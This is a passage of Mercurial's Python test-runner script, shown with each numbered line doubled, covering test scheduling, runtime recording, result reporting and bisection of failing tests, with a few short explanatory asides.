2224 for line in lines:
2225 line = highlightdiff(line, self.color)
2225 line = highlightdiff(line, self.color)
2226 if PYTHON3:
2226 if PYTHON3:
2227 self.stream.flush()
2227 self.stream.flush()
2228 self.stream.buffer.write(line)
2228 self.stream.buffer.write(line)
2229 self.stream.buffer.flush()
2229 self.stream.buffer.flush()
2230 else:
2230 else:
2231 self.stream.write(line)
2231 self.stream.write(line)
2232 self.stream.flush()
2232 self.stream.flush()
2233
2233
2234 if servefail:
2234 if servefail:
2235 raise test.failureException(
2235 raise test.failureException(
2236 'server failed to start (HGPORT=%s)' % test._startport
2236 'server failed to start (HGPORT=%s)' % test._startport
2237 )
2237 )
2238
2238
2239 # handle interactive prompt without releasing iolock
2239 # handle interactive prompt without releasing iolock
2240 if self._options.interactive:
2240 if self._options.interactive:
2241 if test.readrefout() != expected:
2241 if test.readrefout() != expected:
2242 self.stream.write(
2242 self.stream.write(
2243 'Reference output has changed (run again to prompt '
2243 'Reference output has changed (run again to prompt '
2244 'changes)'
2244 'changes)'
2245 )
2245 )
2246 else:
2246 else:
2247 self.stream.write('Accept this change? [n] ')
2247 self.stream.write('Accept this change? [n] ')
2248 self.stream.flush()
2248 self.stream.flush()
2249 answer = sys.stdin.readline().strip()
2249 answer = sys.stdin.readline().strip()
2250 if answer.lower() in ('y', 'yes'):
2250 if answer.lower() in ('y', 'yes'):
2251 if test.path.endswith(b'.t'):
2251 if test.path.endswith(b'.t'):
2252 rename(test.errpath, test.path)
2252 rename(test.errpath, test.path)
2253 else:
2253 else:
2254 rename(test.errpath, '%s.out' % test.path)
2254 rename(test.errpath, '%s.out' % test.path)
2255 accepted = True
2255 accepted = True
2256 if not accepted:
2256 if not accepted:
2257 self.faildata[test.name] = b''.join(lines)
2257 self.faildata[test.name] = b''.join(lines)
2258
2258
2259 return accepted
2259 return accepted
2260
2260
2261 def startTest(self, test):
2261 def startTest(self, test):
2262 super(TestResult, self).startTest(test)
2262 super(TestResult, self).startTest(test)
2263
2263
2264 # os.times() reports the user and system CPU time consumed by this
2264 # os.times() reports the user and system CPU time consumed by this
2265 # process and its child processes, along with elapsed real time. Its
2265 # process and its child processes, along with elapsed real time. Its
2266 # one limitation is that on Windows only the first two fields are
2266 # one limitation is that on Windows only the first two fields are
2267 # filled in, which is why we fall back to another function for wall
2267 # filled in, which is why we fall back to another function for wall
2268 # time calculations.
2268 # time calculations.
2269 test.started_times = os.times()
2269 test.started_times = os.times()
2270 # TODO use a monotonic clock once support for Python 2.7 is dropped.
2270 # TODO use a monotonic clock once support for Python 2.7 is dropped.
2271 test.started_time = time.time()
2271 test.started_time = time.time()
2272 if self._firststarttime is None: # thread racy but irrelevant
2272 if self._firststarttime is None: # thread racy but irrelevant
2273 self._firststarttime = test.started_time
2273 self._firststarttime = test.started_time
2274
2274
2275 def stopTest(self, test, interrupted=False):
2275 def stopTest(self, test, interrupted=False):
2276 super(TestResult, self).stopTest(test)
2276 super(TestResult, self).stopTest(test)
2277
2277
2278 test.stopped_times = os.times()
2278 test.stopped_times = os.times()
2279 stopped_time = time.time()
2279 stopped_time = time.time()
2280
2280
2281 starttime = test.started_times
2281 starttime = test.started_times
2282 endtime = test.stopped_times
2282 endtime = test.stopped_times
2283 origin = self._firststarttime
2283 origin = self._firststarttime
2284 self.times.append(
2284 self.times.append(
2285 (
2285 (
2286 test.name,
2286 test.name,
2287 endtime[2] - starttime[2], # user space CPU time
2287 endtime[2] - starttime[2], # user space CPU time
2288 endtime[3] - starttime[3], # sys space CPU time
2288 endtime[3] - starttime[3], # sys space CPU time
2289 stopped_time - test.started_time, # real time
2289 stopped_time - test.started_time, # real time
2290 test.started_time - origin, # start date in run context
2290 test.started_time - origin, # start date in run context
2291 stopped_time - origin, # end date in run context
2291 stopped_time - origin, # end date in run context
2292 )
2292 )
2293 )
2293 )
2294
2294
2295 if interrupted:
2295 if interrupted:
2296 with iolock:
2296 with iolock:
2297 self.stream.writeln(
2297 self.stream.writeln(
2298 'INTERRUPTED: %s (after %d seconds)'
2298 'INTERRUPTED: %s (after %d seconds)'
2299 % (test.name, self.times[-1][3])
2299 % (test.name, self.times[-1][3])
2300 )
2300 )
2301
2301
2302
2302
2303 def getTestResult():
2303 def getTestResult():
2304 """
2304 """
2305 Return the TestResult class to use, honoring CUSTOM_TEST_RESULT if set
2305 Return the TestResult class to use, honoring CUSTOM_TEST_RESULT if set
2306 """
2306 """
2307 if "CUSTOM_TEST_RESULT" in os.environ:
2307 if "CUSTOM_TEST_RESULT" in os.environ:
2308 testresultmodule = __import__(os.environ["CUSTOM_TEST_RESULT"])
2308 testresultmodule = __import__(os.environ["CUSTOM_TEST_RESULT"])
2309 return testresultmodule.TestResult
2309 return testresultmodule.TestResult
2310 else:
2310 else:
2311 return TestResult
2311 return TestResult
2312
2312
2313
2313
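getTestResult() above is the hook for plugging in a custom result class: when CUSTOM_TEST_RESULT names an importable module, that module's TestResult attribute is instantiated instead of the built-in class. A minimal sketch of such a module follows; the module name mytestresult and the reporting behaviour are assumptions for illustration, and a real replacement would also need to provide the rest of the interface the harness expects from its own TestResult (onStart, ignored, faildata, times and so on), which this sketch does not attempt to reproduce.

# mytestresult.py -- hypothetical module selected with
#   CUSTOM_TEST_RESULT=mytestresult ./run-tests.py ...
# run-tests.py only looks up a module-level ``TestResult`` attribute and
# instantiates it as TestResult(options, stream, descriptions, verbosity);
# everything else below is an illustrative placeholder.
import unittest


class TestResult(unittest.TextTestResult):
    def __init__(self, options, stream, descriptions, verbosity):
        super(TestResult, self).__init__(stream, descriptions, verbosity)
        self._options = options  # harness option namespace, kept around

    def addSuccess(self, test):
        super(TestResult, self).addSuccess(test)
        self.stream.write('PASS %s\n' % getattr(test, 'name', test.id()))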
2314 class TestSuite(unittest.TestSuite):
2314 class TestSuite(unittest.TestSuite):
2315 """Custom unittest TestSuite that knows how to execute Mercurial tests."""
2315 """Custom unittest TestSuite that knows how to execute Mercurial tests."""
2316
2316
2317 def __init__(
2317 def __init__(
2318 self,
2318 self,
2319 testdir,
2319 testdir,
2320 jobs=1,
2320 jobs=1,
2321 whitelist=None,
2321 whitelist=None,
2322 blacklist=None,
2322 blacklist=None,
2323 retest=False,
2323 retest=False,
2324 keywords=None,
2324 keywords=None,
2325 loop=False,
2325 loop=False,
2326 runs_per_test=1,
2326 runs_per_test=1,
2327 loadtest=None,
2327 loadtest=None,
2328 showchannels=False,
2328 showchannels=False,
2329 *args,
2329 *args,
2330 **kwargs
2330 **kwargs
2331 ):
2331 ):
2332 """Create a new instance that can run tests with a configuration.
2332 """Create a new instance that can run tests with a configuration.
2333
2333
2334 testdir specifies the directory where tests are executed from. This
2334 testdir specifies the directory where tests are executed from. This
2335 is typically the ``tests`` directory from Mercurial's source
2335 is typically the ``tests`` directory from Mercurial's source
2336 repository.
2336 repository.
2337
2337
2338 jobs specifies the number of jobs to run concurrently. Each test
2338 jobs specifies the number of jobs to run concurrently. Each test
2339 executes on its own thread. Tests actually spawn new processes, so
2339 executes on its own thread. Tests actually spawn new processes, so
2340 state mutation should not be an issue.
2340 state mutation should not be an issue.
2341
2341
2342 If there is only one job, it will use the main thread.
2342 If there is only one job, it will use the main thread.
2343
2343
2344 whitelist and blacklist denote tests that have been whitelisted and
2344 whitelist and blacklist denote tests that have been whitelisted and
2345 blacklisted, respectively. These arguments don't belong in TestSuite.
2345 blacklisted, respectively. These arguments don't belong in TestSuite.
2346 Instead, whitelist and blacklist should be handled by the thing that
2346 Instead, whitelist and blacklist should be handled by the thing that
2347 populates the TestSuite with tests. They are present to preserve
2347 populates the TestSuite with tests. They are present to preserve
2348 backwards compatible behavior which reports skipped tests as part
2348 backwards compatible behavior which reports skipped tests as part
2349 of the results.
2349 of the results.
2350
2350
2351 retest denotes whether to retest failed tests. This arguably belongs
2351 retest denotes whether to retest failed tests. This arguably belongs
2352 outside of TestSuite.
2352 outside of TestSuite.
2353
2353
2354 keywords denotes key words that will be used to filter which tests
2354 keywords denotes key words that will be used to filter which tests
2355 to execute. This arguably belongs outside of TestSuite.
2355 to execute. This arguably belongs outside of TestSuite.
2356
2356
2357 loop denotes whether to loop over tests forever.
2357 loop denotes whether to loop over tests forever.
2358 """
2358 """
2359 super(TestSuite, self).__init__(*args, **kwargs)
2359 super(TestSuite, self).__init__(*args, **kwargs)
2360
2360
2361 self._jobs = jobs
2361 self._jobs = jobs
2362 self._whitelist = whitelist
2362 self._whitelist = whitelist
2363 self._blacklist = blacklist
2363 self._blacklist = blacklist
2364 self._retest = retest
2364 self._retest = retest
2365 self._keywords = keywords
2365 self._keywords = keywords
2366 self._loop = loop
2366 self._loop = loop
2367 self._runs_per_test = runs_per_test
2367 self._runs_per_test = runs_per_test
2368 self._loadtest = loadtest
2368 self._loadtest = loadtest
2369 self._showchannels = showchannels
2369 self._showchannels = showchannels
2370
2370
2371 def run(self, result):
2371 def run(self, result):
2372 # We have a number of filters that need to be applied. We do this
2372 # We have a number of filters that need to be applied. We do this
2373 # here instead of inside Test because it makes the running logic for
2373 # here instead of inside Test because it makes the running logic for
2374 # Test simpler.
2374 # Test simpler.
2375 tests = []
2375 tests = []
2376 num_tests = [0]
2376 num_tests = [0]
2377 for test in self._tests:
2377 for test in self._tests:
2378
2378
2379 def get():
2379 def get():
2380 num_tests[0] += 1
2380 num_tests[0] += 1
2381 if getattr(test, 'should_reload', False):
2381 if getattr(test, 'should_reload', False):
2382 return self._loadtest(test, num_tests[0])
2382 return self._loadtest(test, num_tests[0])
2383 return test
2383 return test
2384
2384
2385 if not os.path.exists(test.path):
2385 if not os.path.exists(test.path):
2386 result.addSkip(test, "Doesn't exist")
2386 result.addSkip(test, "Doesn't exist")
2387 continue
2387 continue
2388
2388
2389 if not (self._whitelist and test.bname in self._whitelist):
2389 if not (self._whitelist and test.bname in self._whitelist):
2390 if self._blacklist and test.bname in self._blacklist:
2390 if self._blacklist and test.bname in self._blacklist:
2391 result.addSkip(test, 'blacklisted')
2391 result.addSkip(test, 'blacklisted')
2392 continue
2392 continue
2393
2393
2394 if self._retest and not os.path.exists(test.errpath):
2394 if self._retest and not os.path.exists(test.errpath):
2395 result.addIgnore(test, 'not retesting')
2395 result.addIgnore(test, 'not retesting')
2396 continue
2396 continue
2397
2397
2398 if self._keywords:
2398 if self._keywords:
2399 with open(test.path, 'rb') as f:
2399 with open(test.path, 'rb') as f:
2400 t = f.read().lower() + test.bname.lower()
2400 t = f.read().lower() + test.bname.lower()
2401 ignored = False
2401 ignored = False
2402 for k in self._keywords.lower().split():
2402 for k in self._keywords.lower().split():
2403 if k not in t:
2403 if k not in t:
2404 result.addIgnore(test, "doesn't match keyword")
2404 result.addIgnore(test, "doesn't match keyword")
2405 ignored = True
2405 ignored = True
2406 break
2406 break
2407
2407
2408 if ignored:
2408 if ignored:
2409 continue
2409 continue
2410 for _ in xrange(self._runs_per_test):
2410 for _ in xrange(self._runs_per_test):
2411 tests.append(get())
2411 tests.append(get())
2412
2412
2413 runtests = list(tests)
2413 runtests = list(tests)
2414 done = queue.Queue()
2414 done = queue.Queue()
2415 running = 0
2415 running = 0
2416
2416
2417 channels = [""] * self._jobs
2417 channels = [""] * self._jobs
2418
2418
2419 def job(test, result):
2419 def job(test, result):
2420 for n, v in enumerate(channels):
2420 for n, v in enumerate(channels):
2421 if not v:
2421 if not v:
2422 channel = n
2422 channel = n
2423 break
2423 break
2424 else:
2424 else:
2425 raise ValueError('Could not find output channel')
2425 raise ValueError('Could not find output channel')
2426 channels[channel] = "=" + test.name[5:].split(".")[0]
2426 channels[channel] = "=" + test.name[5:].split(".")[0]
2427 try:
2427 try:
2428 test(result)
2428 test(result)
2429 done.put(None)
2429 done.put(None)
2430 except KeyboardInterrupt:
2430 except KeyboardInterrupt:
2431 pass
2431 pass
2432 except: # re-raises
2432 except: # re-raises
2433 done.put(('!', test, 'run-test raised an error, see traceback'))
2433 done.put(('!', test, 'run-test raised an error, see traceback'))
2434 raise
2434 raise
2435 finally:
2435 finally:
2436 try:
2436 try:
2437 channels[channel] = ''
2437 channels[channel] = ''
2438 except IndexError:
2438 except IndexError:
2439 pass
2439 pass
2440
2440
2441 def stat():
2441 def stat():
2442 count = 0
2442 count = 0
2443 while channels:
2443 while channels:
2444 d = '\n%03s ' % count
2444 d = '\n%03s ' % count
2445 for n, v in enumerate(channels):
2445 for n, v in enumerate(channels):
2446 if v:
2446 if v:
2447 d += v[0]
2447 d += v[0]
2448 channels[n] = v[1:] or '.'
2448 channels[n] = v[1:] or '.'
2449 else:
2449 else:
2450 d += ' '
2450 d += ' '
2451 d += ' '
2451 d += ' '
2452 with iolock:
2452 with iolock:
2453 sys.stdout.write(d + ' ')
2453 sys.stdout.write(d + ' ')
2454 sys.stdout.flush()
2454 sys.stdout.flush()
2455 for x in xrange(10):
2455 for x in xrange(10):
2456 if channels:
2456 if channels:
2457 time.sleep(0.1)
2457 time.sleep(0.1)
2458 count += 1
2458 count += 1
2459
2459
2460 stoppedearly = False
2460 stoppedearly = False
2461
2461
2462 if self._showchannels:
2462 if self._showchannels:
2463 statthread = threading.Thread(target=stat, name="stat")
2463 statthread = threading.Thread(target=stat, name="stat")
2464 statthread.start()
2464 statthread.start()
2465
2465
2466 try:
2466 try:
2467 while tests or running:
2467 while tests or running:
2468 if not done.empty() or running == self._jobs or not tests:
2468 if not done.empty() or running == self._jobs or not tests:
2469 try:
2469 try:
2470 done.get(True, 1)
2470 done.get(True, 1)
2471 running -= 1
2471 running -= 1
2472 if result and result.shouldStop:
2472 if result and result.shouldStop:
2473 stoppedearly = True
2473 stoppedearly = True
2474 break
2474 break
2475 except queue.Empty:
2475 except queue.Empty:
2476 continue
2476 continue
2477 if tests and not running == self._jobs:
2477 if tests and not running == self._jobs:
2478 test = tests.pop(0)
2478 test = tests.pop(0)
2479 if self._loop:
2479 if self._loop:
2480 if getattr(test, 'should_reload', False):
2480 if getattr(test, 'should_reload', False):
2481 num_tests[0] += 1
2481 num_tests[0] += 1
2482 tests.append(self._loadtest(test, num_tests[0]))
2482 tests.append(self._loadtest(test, num_tests[0]))
2483 else:
2483 else:
2484 tests.append(test)
2484 tests.append(test)
2485 if self._jobs == 1:
2485 if self._jobs == 1:
2486 job(test, result)
2486 job(test, result)
2487 else:
2487 else:
2488 t = threading.Thread(
2488 t = threading.Thread(
2489 target=job, name=test.name, args=(test, result)
2489 target=job, name=test.name, args=(test, result)
2490 )
2490 )
2491 t.start()
2491 t.start()
2492 running += 1
2492 running += 1
2493
2493
2494 # If we stop early we still need to wait on started tests to
2494 # If we stop early we still need to wait on started tests to
2495 # finish. Otherwise, there is a race between the test completing
2495 # finish. Otherwise, there is a race between the test completing
2496 # and the test's cleanup code running. This could result in the
2496 # and the test's cleanup code running. This could result in the
2497 # test being reported incorrectly.
2497 # test being reported incorrectly.
2498 if stoppedearly:
2498 if stoppedearly:
2499 while running:
2499 while running:
2500 try:
2500 try:
2501 done.get(True, 1)
2501 done.get(True, 1)
2502 running -= 1
2502 running -= 1
2503 except queue.Empty:
2503 except queue.Empty:
2504 continue
2504 continue
2505 except KeyboardInterrupt:
2505 except KeyboardInterrupt:
2506 for test in runtests:
2506 for test in runtests:
2507 test.abort()
2507 test.abort()
2508
2508
2509 channels = []
2509 channels = []
2510
2510
2511 return result
2511 return result
2512
2512
2513
2513
2514 # Save the most recent 5 wall-clock runtimes of each test to a
2514 # Save the most recent 5 wall-clock runtimes of each test to a
2515 # human-readable text file named .testtimes. Tests are sorted
2515 # human-readable text file named .testtimes. Tests are sorted
2516 # alphabetically, while times for each test are listed from oldest to
2516 # alphabetically, while times for each test are listed from oldest to
2517 # newest.
2517 # newest.
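Concretely, each line of .testtimes is the test name followed by up to five space-separated wall-clock runtimes, oldest first, which is exactly what the regular expression in loadtimes() below picks apart. A short sketch, with an invented test name and made-up numbers:

# Illustrative only: the line format written by savetimes() and read back
# by loadtimes(); the test name and timings here are invented.
import re

sample = 'test-commit.t 0.713 0.698 0.701 0.690 0.702\n'
m = re.match('(.*?) ([0-9. ]+)', sample)
name = m.group(1)                              # 'test-commit.t'
runs = [float(t) for t in m.group(2).split()]  # oldest ... newest
assert runs[-1] == 0.702                       # most recent runtime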
2518
2518
2519
2519
2520 def loadtimes(outputdir):
2520 def loadtimes(outputdir):
2521 times = []
2521 times = []
2522 try:
2522 try:
2523 with open(os.path.join(outputdir, b'.testtimes')) as fp:
2523 with open(os.path.join(outputdir, b'.testtimes')) as fp:
2524 for line in fp:
2524 for line in fp:
2525 m = re.match('(.*?) ([0-9. ]+)', line)
2525 m = re.match('(.*?) ([0-9. ]+)', line)
2526 times.append(
2526 times.append(
2527 (m.group(1), [float(t) for t in m.group(2).split()])
2527 (m.group(1), [float(t) for t in m.group(2).split()])
2528 )
2528 )
2529 except IOError as err:
2529 except IOError as err:
2530 if err.errno != errno.ENOENT:
2530 if err.errno != errno.ENOENT:
2531 raise
2531 raise
2532 return times
2532 return times
2533
2533
2534
2534
2535 def savetimes(outputdir, result):
2535 def savetimes(outputdir, result):
2536 saved = dict(loadtimes(outputdir))
2536 saved = dict(loadtimes(outputdir))
2537 maxruns = 5
2537 maxruns = 5
2538 skipped = set([str(t[0]) for t in result.skipped])
2538 skipped = set([str(t[0]) for t in result.skipped])
2539 for tdata in result.times:
2539 for tdata in result.times:
2540 test, real = tdata[0], tdata[3]
2540 test, real = tdata[0], tdata[3]
2541 if test not in skipped:
2541 if test not in skipped:
2542 ts = saved.setdefault(test, [])
2542 ts = saved.setdefault(test, [])
2543 ts.append(real)
2543 ts.append(real)
2544 ts[:] = ts[-maxruns:]
2544 ts[:] = ts[-maxruns:]
2545
2545
2546 fd, tmpname = tempfile.mkstemp(
2546 fd, tmpname = tempfile.mkstemp(
2547 prefix=b'.testtimes', dir=outputdir, text=True
2547 prefix=b'.testtimes', dir=outputdir, text=True
2548 )
2548 )
2549 with os.fdopen(fd, 'w') as fp:
2549 with os.fdopen(fd, 'w') as fp:
2550 for name, ts in sorted(saved.items()):
2550 for name, ts in sorted(saved.items()):
2551 fp.write('%s %s\n' % (name, ' '.join(['%.3f' % (t,) for t in ts])))
2551 fp.write('%s %s\n' % (name, ' '.join(['%.3f' % (t,) for t in ts])))
2552 timepath = os.path.join(outputdir, b'.testtimes')
2552 timepath = os.path.join(outputdir, b'.testtimes')
2553 try:
2553 try:
2554 os.unlink(timepath)
2554 os.unlink(timepath)
2555 except OSError:
2555 except OSError:
2556 pass
2556 pass
2557 try:
2557 try:
2558 os.rename(tmpname, timepath)
2558 os.rename(tmpname, timepath)
2559 except OSError:
2559 except OSError:
2560 pass
2560 pass
2561
2561
2562
2562
2563 class TextTestRunner(unittest.TextTestRunner):
2563 class TextTestRunner(unittest.TextTestRunner):
2564 """Custom unittest test runner that uses appropriate settings."""
2564 """Custom unittest test runner that uses appropriate settings."""
2565
2565
2566 def __init__(self, runner, *args, **kwargs):
2566 def __init__(self, runner, *args, **kwargs):
2567 super(TextTestRunner, self).__init__(*args, **kwargs)
2567 super(TextTestRunner, self).__init__(*args, **kwargs)
2568
2568
2569 self._runner = runner
2569 self._runner = runner
2570
2570
2571 self._result = getTestResult()(
2571 self._result = getTestResult()(
2572 self._runner.options, self.stream, self.descriptions, self.verbosity
2572 self._runner.options, self.stream, self.descriptions, self.verbosity
2573 )
2573 )
2574
2574
2575 def listtests(self, test):
2575 def listtests(self, test):
2576 test = sorted(test, key=lambda t: t.name)
2576 test = sorted(test, key=lambda t: t.name)
2577
2577
2578 self._result.onStart(test)
2578 self._result.onStart(test)
2579
2579
2580 for t in test:
2580 for t in test:
2581 print(t.name)
2581 print(t.name)
2582 self._result.addSuccess(t)
2582 self._result.addSuccess(t)
2583
2583
2584 if self._runner.options.xunit:
2584 if self._runner.options.xunit:
2585 with open(self._runner.options.xunit, "wb") as xuf:
2585 with open(self._runner.options.xunit, "wb") as xuf:
2586 self._writexunit(self._result, xuf)
2586 self._writexunit(self._result, xuf)
2587
2587
2588 if self._runner.options.json:
2588 if self._runner.options.json:
2589 jsonpath = os.path.join(self._runner._outputdir, b'report.json')
2589 jsonpath = os.path.join(self._runner._outputdir, b'report.json')
2590 with open(jsonpath, 'w') as fp:
2590 with open(jsonpath, 'w') as fp:
2591 self._writejson(self._result, fp)
2591 self._writejson(self._result, fp)
2592
2592
2593 return self._result
2593 return self._result
2594
2594
2595 def run(self, test):
2595 def run(self, test):
2596 self._result.onStart(test)
2596 self._result.onStart(test)
2597 test(self._result)
2597 test(self._result)
2598
2598
2599 failed = len(self._result.failures)
2599 failed = len(self._result.failures)
2600 skipped = len(self._result.skipped)
2600 skipped = len(self._result.skipped)
2601 ignored = len(self._result.ignored)
2601 ignored = len(self._result.ignored)
2602
2602
2603 with iolock:
2603 with iolock:
2604 self.stream.writeln('')
2604 self.stream.writeln('')
2605
2605
2606 if not self._runner.options.noskips:
2606 if not self._runner.options.noskips:
2607 for test, msg in sorted(
2607 for test, msg in sorted(
2608 self._result.skipped, key=lambda s: s[0].name
2608 self._result.skipped, key=lambda s: s[0].name
2609 ):
2609 ):
2610 formatted = 'Skipped %s: %s\n' % (test.name, msg)
2610 formatted = 'Skipped %s: %s\n' % (test.name, msg)
2611 msg = highlightmsg(formatted, self._result.color)
2611 msg = highlightmsg(formatted, self._result.color)
2612 self.stream.write(msg)
2612 self.stream.write(msg)
2613 for test, msg in sorted(
2613 for test, msg in sorted(
2614 self._result.failures, key=lambda f: f[0].name
2614 self._result.failures, key=lambda f: f[0].name
2615 ):
2615 ):
2616 formatted = 'Failed %s: %s\n' % (test.name, msg)
2616 formatted = 'Failed %s: %s\n' % (test.name, msg)
2617 self.stream.write(highlightmsg(formatted, self._result.color))
2617 self.stream.write(highlightmsg(formatted, self._result.color))
2618 for test, msg in sorted(
2618 for test, msg in sorted(
2619 self._result.errors, key=lambda e: e[0].name
2619 self._result.errors, key=lambda e: e[0].name
2620 ):
2620 ):
2621 self.stream.writeln('Errored %s: %s' % (test.name, msg))
2621 self.stream.writeln('Errored %s: %s' % (test.name, msg))
2622
2622
2623 if self._runner.options.xunit:
2623 if self._runner.options.xunit:
2624 with open(self._runner.options.xunit, "wb") as xuf:
2624 with open(self._runner.options.xunit, "wb") as xuf:
2625 self._writexunit(self._result, xuf)
2625 self._writexunit(self._result, xuf)
2626
2626
2627 if self._runner.options.json:
2627 if self._runner.options.json:
2628 jsonpath = os.path.join(self._runner._outputdir, b'report.json')
2628 jsonpath = os.path.join(self._runner._outputdir, b'report.json')
2629 with open(jsonpath, 'w') as fp:
2629 with open(jsonpath, 'w') as fp:
2630 self._writejson(self._result, fp)
2630 self._writejson(self._result, fp)
2631
2631
2632 self._runner._checkhglib('Tested')
2632 self._runner._checkhglib('Tested')
2633
2633
2634 savetimes(self._runner._outputdir, self._result)
2634 savetimes(self._runner._outputdir, self._result)
2635
2635
2636 if failed and self._runner.options.known_good_rev:
2636 if failed and self._runner.options.known_good_rev:
2637 self._bisecttests(t for t, m in self._result.failures)
2637 self._bisecttests(t for t, m in self._result.failures)
2638 self.stream.writeln(
2638 self.stream.writeln(
2639 '# Ran %d tests, %d skipped, %d failed.'
2639 '# Ran %d tests, %d skipped, %d failed.'
2640 % (self._result.testsRun, skipped + ignored, failed)
2640 % (self._result.testsRun, skipped + ignored, failed)
2641 )
2641 )
2642 if failed:
2642 if failed:
2643 self.stream.writeln(
2643 self.stream.writeln(
2644 'python hash seed: %s' % os.environ['PYTHONHASHSEED']
2644 'python hash seed: %s' % os.environ['PYTHONHASHSEED']
2645 )
2645 )
2646 if self._runner.options.time:
2646 if self._runner.options.time:
2647 self.printtimes(self._result.times)
2647 self.printtimes(self._result.times)
2648
2648
2649 if self._runner.options.exceptions:
2649 if self._runner.options.exceptions:
2650 exceptions = aggregateexceptions(
2650 exceptions = aggregateexceptions(
2651 os.path.join(self._runner._outputdir, b'exceptions')
2651 os.path.join(self._runner._outputdir, b'exceptions')
2652 )
2652 )
2653
2653
2654 self.stream.writeln('Exceptions Report:')
2654 self.stream.writeln('Exceptions Report:')
2655 self.stream.writeln(
2655 self.stream.writeln(
2656 '%d total from %d frames'
2656 '%d total from %d frames'
2657 % (exceptions['total'], len(exceptions['exceptioncounts']))
2657 % (exceptions['total'], len(exceptions['exceptioncounts']))
2658 )
2658 )
2659 combined = exceptions['combined']
2659 combined = exceptions['combined']
2660 for key in sorted(combined, key=combined.get, reverse=True):
2660 for key in sorted(combined, key=combined.get, reverse=True):
2661 frame, line, exc = key
2661 frame, line, exc = key
2662 totalcount, testcount, leastcount, leasttest = combined[key]
2662 totalcount, testcount, leastcount, leasttest = combined[key]
2663
2663
2664 self.stream.writeln(
2664 self.stream.writeln(
2665 '%d (%d tests)\t%s: %s (%s - %d total)'
2665 '%d (%d tests)\t%s: %s (%s - %d total)'
2666 % (
2666 % (
2667 totalcount,
2667 totalcount,
2668 testcount,
2668 testcount,
2669 frame,
2669 frame,
2670 exc,
2670 exc,
2671 leasttest,
2671 leasttest,
2672 leastcount,
2672 leastcount,
2673 )
2673 )
2674 )
2674 )
2675
2675
2676 self.stream.flush()
2676 self.stream.flush()
2677
2677
2678 return self._result
2678 return self._result
2679
2679
2680 def _bisecttests(self, tests):
2680 def _bisecttests(self, tests):
2681 bisectcmd = ['hg', 'bisect']
2681 bisectcmd = ['hg', 'bisect']
2682 bisectrepo = self._runner.options.bisect_repo
2682 bisectrepo = self._runner.options.bisect_repo
2683 if bisectrepo:
2683 if bisectrepo:
2684 bisectcmd.extend(['-R', os.path.abspath(bisectrepo)])
2684 bisectcmd.extend(['-R', os.path.abspath(bisectrepo)])
2685
2685
2686 def pread(args):
2686 def pread(args):
2687 env = os.environ.copy()
2687 env = os.environ.copy()
2688 env['HGPLAIN'] = '1'
2688 env['HGPLAIN'] = '1'
2689 p = subprocess.Popen(
2689 p = subprocess.Popen(
2690 args, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, env=env
2690 args, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, env=env
2691 )
2691 )
2692 data = p.stdout.read()
2692 data = p.stdout.read()
2693 p.wait()
2693 p.wait()
2694 return data
2694 return data
2695
2695
2696 for test in tests:
2696 for test in tests:
2697 pread(bisectcmd + ['--reset']),
2697 pread(bisectcmd + ['--reset']),
2698 pread(bisectcmd + ['--bad', '.'])
2698 pread(bisectcmd + ['--bad', '.'])
2699 pread(bisectcmd + ['--good', self._runner.options.known_good_rev])
2699 pread(bisectcmd + ['--good', self._runner.options.known_good_rev])
2700 # TODO: we probably need to forward more options
2700 # TODO: we probably need to forward more options
2701 # that alter hg's behavior inside the tests.
2701 # that alter hg's behavior inside the tests.
2702 opts = ''
2702 opts = ''
2703 withhg = self._runner.options.with_hg
2703 withhg = self._runner.options.with_hg
2704 if withhg:
2704 if withhg:
2705 opts += ' --with-hg=%s ' % shellquote(_strpath(withhg))
2705 opts += ' --with-hg=%s ' % shellquote(_strpath(withhg))
2706 rtc = '%s %s %s %s' % (sysexecutable, sys.argv[0], opts, test)
2706 rtc = '%s %s %s %s' % (sysexecutable, sys.argv[0], opts, test)
2707 data = pread(bisectcmd + ['--command', rtc])
2707 data = pread(bisectcmd + ['--command', rtc])
2708 m = re.search(
2708 m = re.search(
2709 (
2709 (
2710 br'\nThe first (?P<goodbad>bad|good) revision '
2710 br'\nThe first (?P<goodbad>bad|good) revision '
2711 br'is:\nchangeset: +\d+:(?P<node>[a-f0-9]+)\n.*\n'
2711 br'is:\nchangeset: +\d+:(?P<node>[a-f0-9]+)\n.*\n'
2712 br'summary: +(?P<summary>[^\n]+)\n'
2712 br'summary: +(?P<summary>[^\n]+)\n'
2713 ),
2713 ),
2714 data,
2714 data,
2715 (re.MULTILINE | re.DOTALL),
2715 (re.MULTILINE | re.DOTALL),
2716 )
2716 )
2717 if m is None:
2717 if m is None:
2718 self.stream.writeln(
2718 self.stream.writeln(
2719 'Failed to identify failure point for %s' % test
2719 'Failed to identify failure point for %s' % test
2720 )
2720 )
2721 continue
2721 continue
2722 dat = m.groupdict()
2722 dat = m.groupdict()
2723 verb = 'broken' if dat['goodbad'] == b'bad' else 'fixed'
2723 verb = 'broken' if dat['goodbad'] == b'bad' else 'fixed'
2724 self.stream.writeln(
2724 self.stream.writeln(
2725 '%s %s by %s (%s)'
2725 '%s %s by %s (%s)'
2726 % (
2726 % (
2727 test,
2727 test,
2728 verb,
2728 verb,
2729 dat['node'].decode('ascii'),
2729 dat['node'].decode('ascii'),
2730 dat['summary'].decode('utf8', 'ignore'),
2730 dat['summary'].decode('utf8', 'ignore'),
2731 )
2731 )
2732 )
2732 )
2733
2733
2734 def printtimes(self, times):
2734 def printtimes(self, times):
2735 # iolock held by run
2735 # iolock held by run
2736 self.stream.writeln('# Producing time report')
2736 self.stream.writeln('# Producing time report')
2737 times.sort(key=lambda t: (t[3]))
2737 times.sort(key=lambda t: (t[3]))
2738 cols = '%7.3f %7.3f %7.3f %7.3f %7.3f %s'
2738 cols = '%7.3f %7.3f %7.3f %7.3f %7.3f %s'
2739 self.stream.writeln(
2739 self.stream.writeln(
2740 '%-7s %-7s %-7s %-7s %-7s %s'
2740 '%-7s %-7s %-7s %-7s %-7s %s'
2741 % ('start', 'end', 'cuser', 'csys', 'real', 'Test')
2741 % ('start', 'end', 'cuser', 'csys', 'real', 'Test')
2742 )
2742 )
2743 for tdata in times:
2743 for tdata in times:
2744 test = tdata[0]
2744 test = tdata[0]
2745 cuser, csys, real, start, end = tdata[1:6]
2745 cuser, csys, real, start, end = tdata[1:6]
2746 self.stream.writeln(cols % (start, end, cuser, csys, real, test))
2746 self.stream.writeln(cols % (start, end, cuser, csys, real, test))
2747
2747
2748 @staticmethod
2748 @staticmethod
2749 def _writexunit(result, outf):
2749 def _writexunit(result, outf):
